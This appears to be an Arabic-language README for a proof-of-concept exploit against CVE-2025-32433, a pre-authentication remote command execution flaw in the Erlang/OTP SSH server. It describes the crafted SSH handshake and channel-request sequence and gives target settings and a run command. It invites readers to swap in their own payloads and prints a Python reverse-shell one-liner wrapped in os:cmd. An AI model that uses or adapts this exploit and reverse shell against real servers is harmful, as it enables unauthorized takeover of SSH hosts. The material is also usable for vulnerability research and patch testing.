
استغلال لإثبات المفهوم لثغرة CVE-2025-32433، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) قبل المصادقة في خادم SSH الخاص بـ Erlang/OTP. يتضمن سكربت Python لإرسال طلبات قنوات SSH مُصمّمة خصيصًا وتنفيذ أوامر اعتباطية.
CVE-2025-32433 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) تؤثر على خدمة SSH في Erlang/OTP.
السبب الجذري هو المعالجة غير السليمة لطلبات قنوات SSH قبل المصادقة، والتي يمكن للمهاجم صياغتها
للتسبب في تنفيذ أوامر عشوائية قبل المصادقة.
يُظهر إثبات المفهوم المرفق (PoC) إرسال حزم SSH مصاغة من هذا القبيل؛ وهو يكتب افتراضيًا /lab.txt على الهدف، ويمكن تكييفه لأوامر أخرى.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
افتراضيًا، ينشئ /lab.txt يحتوي على pwned.
عدّل الحمولة في build_channel_request لتشغيل أوامرك الخاصة.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT مصاغة لتبدو كمصافحة عادية.SSH_MSG_CHANNEL_OPEN وSSH_MSG_CHANNEL_REQUEST مع حمولة exec قبل المصادقة.الاكتشاف والتوثيق بواسطة Matt Keeley (أمن المنصات). شكرًا له على نشر PoC ومشاركة التفاصيل.
رابط المدونة: https://platformsecurity.com/blog/CVE-2025-32433-poc